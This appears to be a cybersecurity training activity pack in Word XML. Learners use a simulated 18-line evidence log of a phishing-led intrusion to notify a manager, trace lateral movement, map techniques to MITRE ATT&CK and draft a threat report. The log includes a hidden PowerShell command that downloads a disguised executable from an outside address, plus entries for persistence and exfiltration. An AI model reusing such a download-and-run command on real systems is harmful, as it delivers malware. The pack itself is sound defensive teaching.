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10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Report the Threat — Notify, Trace It, Name It, Write It Up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this morning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Tell Them in Ten Minutes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Did It Go?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Came In, What Went Out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It Got In, How It Stays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Threat Report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evidence set: 18 lines, E01–E18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at 8:55, and use all morning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1: Ten Minutes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8:35 AM, pairs (observed)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2: Draw the Path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9:20 AM,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Demo 3 record: your own machine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9:40 AM, follow along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3: Name It, Map It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10:35 AM, teams, then on your own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4: Assemble the Report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11:05 AM, on your own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Handing in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11:45 AM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This afternoon is the unit assessment. It is not in this pack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The assessor sends the papers at 1:10 and at 2:00.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 xml:space="preserve">You need: your camera and microphone (Activity 1 is a role-play) · your own Windows machine (Demo 3) · a browser that opens </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://mitre-attack.github.io/attack-navigator/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> · your Day 6 severity matrix · your Day 9 escalation pack for SRV-BAK-02.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0 — THE EVIDENCE SET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What happened after your Day 9 escalation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>11:26 on 17 Sep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> IT isolated SRV-BAK-02. At </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>11:29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> L2 reported that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.8 GB left SRV-BAK-02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on 15 Sep, 04:10–04:52, to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>185.220.101.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. WKS-311 was isolated at 11:40, and the svc_backup password was reset at 11:45. At 15:30 L2 handed you this evidence and asked for the threat report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lab addresses:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WKS-311 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>192.168.10.31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> · SRV-BAK-02 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> · SRV-FILE-01 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> · SRV-FIN-02 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>New event IDs:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7045</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (System log) = a service was installed · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4698</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Security log) = a scheduled task was created · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4624 / 4625</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = logon succeeded / failed · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4688</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = a new process started · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5145</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = a network share was accessed · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4663</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = a file was accessed.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── Monday 14 Sep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E01  16:47:12  Email gateway  DELIVERED  to: m.delacruz  from: billing@payables-ph.example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subject: "Invoice September – overdue"  attachment: Invoice_Sept.docm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E02  16:51:36  WKS-311  4688  New process: powershell.exe   Parent: WINWORD.EXE   User: m.delacruz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powershell -w hidden -c "iwr hxxp://203.0.113.45/p.txt -OutFile C:\Users\Public\svhost32.exe"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E03  16:51:37  Firewall  ALLOW OUT 192.168.10.31:51022 -&gt; 203.0.113.45:80  GET /p.txt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bytes_in=1,245,184  bytes_out=412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E04  16:52:10  WKS-311  4688  New process: C:\Users\Public\svhost32.exe   Parent: powershell.exe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E05  16:52:14  WKS-311  4698  Scheduled task created: \OneDriveSyncHelper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Action: C:\Users\Public\svhost32.exe   Trigger: at logon of any user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── Tuesday 15 Sep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E06  02:14–03:40  Firewall  ALLOW OUT 192.168.10.31 -&gt; 185.220.101.1:443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17 connections, one every ~5 min, bytes_out 1.8–2.2 KB, bytes_in 0.9–1.1 KB each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E07  03:02–03:31  SRV-BAK-02  4625 × 38  Failed logon  svc_backup  type 3  Source: 192.168.10.31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E08  03:33:02  SRV-BAK-02  4624  Successful logon  svc_backup  type 3  Source: 192.168.10.31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E09  03:34–03:35  SRV-FILE-01  4625 × 12  Failed logon  svc_backup, administrator  type 3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Source: 192.168.10.31   (no 4624 follows)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E10  03:38:21  SRV-BAK-02  5145  Share \\*\ADMIN$  Target: Temp\svhost32.exe  WriteData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Account: svc_backup  Source: 192.168.10.31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E11  03:39:02  SRV-BAK-02  7045  Service installed: WinHostSvc  Image: C:\Windows\Temp\svhost32.exe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Start: auto  Account: LocalSystem  (recovery: restart after every failure)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E12  03:40:11  SRV-BAK-02  Defender 1116  Trojan.Agent.XZ  C:\Windows\Temp\svhost32.exe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03:40:12  SRV-BAK-02  Defender 1118  Quarantine FAILED — file in use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E13  03:41 on  Firewall  ALLOW OUT 192.168.10.21 -&gt; 185.220.101.1:443  every ~5 min until 17 Sep 11:26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E14  04:10–04:52  Firewall  ALLOW OUT 192.168.10.21:50311 -&gt; 185.220.101.1:443  one session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bytes_out=1,874,329,600 (≈ 1.8 GB)   bytes_in=48,212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E15  04:05:40  SRV-BAK-02  4663  File read: D:\Backups\FIN_2026-09-14.bak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Process: C:\Windows\Temp\svhost32.exe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── Collected by L2, 17 Sep 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E16  SHA-256 svhost32.exe on WKS-311 and on SRV-BAK-02: 9614A003504A2C4B...ED161329 — the SAME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E17  SRV-FIN-02: 03:22:40 4624 type 10 (remote desktop), fin_admin, from 198.51.100.61 (VPN)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03:40:05 first file renamed .locked by C:\ProgramData\lck.exe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No logon from .31 · no svhost32.exe · no connection to 185.220.101.1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E18  Firewall 14–17 Sep: NO inbound connection from the internet to .31 or .21</w:t>
      </w:r>
    </w:p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TEN MINUTES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8:35 AM · 20 minutes · Topic 10.1 · pairs · OBSERVED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Case N2 (HIGH).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>J. Mendoza</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Operations supervisor, the manager of m.delacruz (the user of WKS-311). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The facts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WKS-311 is where it started. A macro document opened on 14 Sep at 16:51 downloaded a malicious program. It has talked to an outside anonymising address every 5 minutes since. WKS-311 was isolated at 11:40. Nothing shows data leaving WKS-311 itself. The attacker used it as a stepping stone to the backup server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>One of you is the analyst, one is J. Mendoza. Make the call, then swap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Analyst's checklist: tick as you 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Who I am + the ticket ID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"This is a High security notification about WKS-311"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What is known, since when (plain words)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What has been done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What they must do / must not do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One ask, with a time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 Next update + read-back + "in writing within the hour"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 did </w:t>
            </w:r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blame the user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Now write it, together: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To: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Subject:   [HIGH] Security notification — ________ — WKS-311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Date/time:                        Notified by phone at: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Severity:            HIGH — because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What is known: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What has been done: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What you must do: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5. What we need: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6. Next update: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This notification is based on what is known at ____. It will be updated.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&lt;Your name&gt;, L1 analyst   ·   Ticket ____</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>N3: decide.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SRV-FILE-01 had </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>12 failed logons</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from WKS-311 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> successful logon (E09). Do you notify its owner?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes / No: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reason: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DRAW THE PATH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9:20 AM · 20 minutes · Topic 10.2 · teams</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2a. The hosts table.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> One word per host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>origin · confirmed · attempted · not linked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Evidence line(s)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this word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WKS-311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Workstation (m.delacruz)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Backup server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 server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SRV-FIN-02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Finance server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2b. The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Line(s)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2c. Draw it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Draw four boxes. Use a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>solid arrow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for what happened and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>dotted arrow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for what was only attempted. Put SRV-FIN-02 off to the side with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>"not linked"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the line that proves it. Photograph or screenshot the drawing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2d. One sentence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>single line</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the strongest link between WKS-311 and SRV-BAK-02, and why?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DEMO 3 RECORD: YOUR OWN MACHINE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9:40 AM · follow along · Topic 10.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run each command as the trainer does. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Only your own machine. Do not paste your results into the chat.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Established | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess | Sort-Object RemotePort | Format-Table -AutoSize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-Id &lt;number&gt; | Select-Object Id, ProcessName, Path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 | Sort-Object LocalPort | Format-Table -AutoSize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Get-NetAdapterStatistics | Select-Object Name, ReceivedBytes, SentBytes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 found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Ingress or egress? Why?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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>established</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> connection: local port → remote address : remote port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program that owns it (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="A03020"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Get-Process -Id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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>listening</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> port, and its LocalAddress (127.0.0.1 or 0.0.0.0?)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Received bytes vs sent bytes on my network card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Record line:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Ingress / egress check on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">_ (host), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (date/time): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>__."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Now the evidence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fill in from E01–E18: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crossed · from / to · how much · when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Line(s)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Ingress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Egress: the beacon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Egress: data leaving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"Nothing" that is a finding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3: NAME IT, MAP IT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10:35 AM · 20 minutes · Topic 10.4 · teams (10 min), then on your own (10 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4a. Teams: map the behaviours.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check every ID on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://attack.mitre.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. B1–B3 were done in the demo.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Behaviour (plain words)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Tactic (why)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Technique ID and name (how)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Email with a macro document sent to a user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Initial Access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T1566.001 Phishing: Spearphishing Attachment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user opened it and the macro ran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Execution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T1204.002 User Execution: Malicious File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PowerShell ran a hidden command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E02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Execution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T1059.001 Command and Scripting Interpreter: PowerShell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program pulled in from an outside web address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E03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program given a name that looks like a real Windows file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E04, E12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B6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scheduled task to start it at every logon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Many passwords tried on one account until one worked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E07–E08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Then logged on with that real account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B9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program copied to a server through the admin share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E10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B10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Windows service created to run it and restart it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E11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B11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Check-ins every 5 min over HTTPS, through an anonymising network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E06, E13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B12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1.8 GB sent out over that same connection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E14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4b. Exploitation or installation?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write each B-number in one column (some are neither):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Exploitation (how they got in / got more access)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Installation (what they left to stay)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4c. On your own: your Navigator layer.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Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://mitre-attack.github.io/attack-navigator/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Create New Layer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Enterprise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Name the layer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CTM-0007-001 SRV-BAK-02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For each technique: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the ID → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>colour</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the line (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>E07-E08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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Download</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the layer as JSON → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Evidence/Day_10/CTM-0007-001_attack_layer.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Layer downloaded. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If Navigator will not load:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the table in 4a is your evidence. Make the layer later.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ACTIVITY 4: ASSEMBLE THE REPORT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11:05 AM · 25 minutes · Topic 10.5 · on your own</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy this template into a document. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paste in sections 3–10 from Parts 1–4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then write sections 2, 11, 13 and 14. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Every claim points to a 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Header</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: report ID · ticket CTM-0007-001 · author · date · status · "Internal: restricted"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Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: four sentences: what, where, since when, what now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 and notification record</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: severity + reason · who was notified, when, by what channel, read-back? · who was not notified, and why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Hosts and spread</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: the table from Part 2a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Lateral movement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: the path from Part 2b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Ingress</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: from Part 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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: from Part 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Exploitation activity</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: plain words + lines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Installation behaviour</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: plain words + lines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ATT&amp;CK mapping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: the table from Part 4a · layer JSON attached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Timeline</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: 8–12 key events, in order, with dates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Containment status</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: each host: contained? by what? when?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we do not know yet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: at least three honest gaps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Recommendations and asks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">: three, each a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>verb · owner · by when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Attachments</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>: the evidence set · hashes · layer JSON · Day 7 ticket · Day 8 worksheet · Day 9 pack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Before you stop: check three sentences.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Copy any three sentences from your report. Does each point to a line?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Sentence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Line?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Fixed?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Evidence/Day_10/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>11:45 AM, as it stands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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Part 1: N2 written notification, your checklist, and the N3 decision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Part 2: hosts table, path, and drawing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Part 3: own-machine record + the evidence table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Part 4: mapping table + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="A03020"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CTM-0007-001_attack_layer.json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Part 5: the threat report (draft is fine; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>finish it by the end of Day 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>At 1:00 PM:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> camera on · your Handouts and Activity Packs from Days 6–10 open · Windows Security working · your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Day 6 EICAR string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ready to paste · your Evidence folders from Day 3 and Days 5–10 filed. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Eat something first.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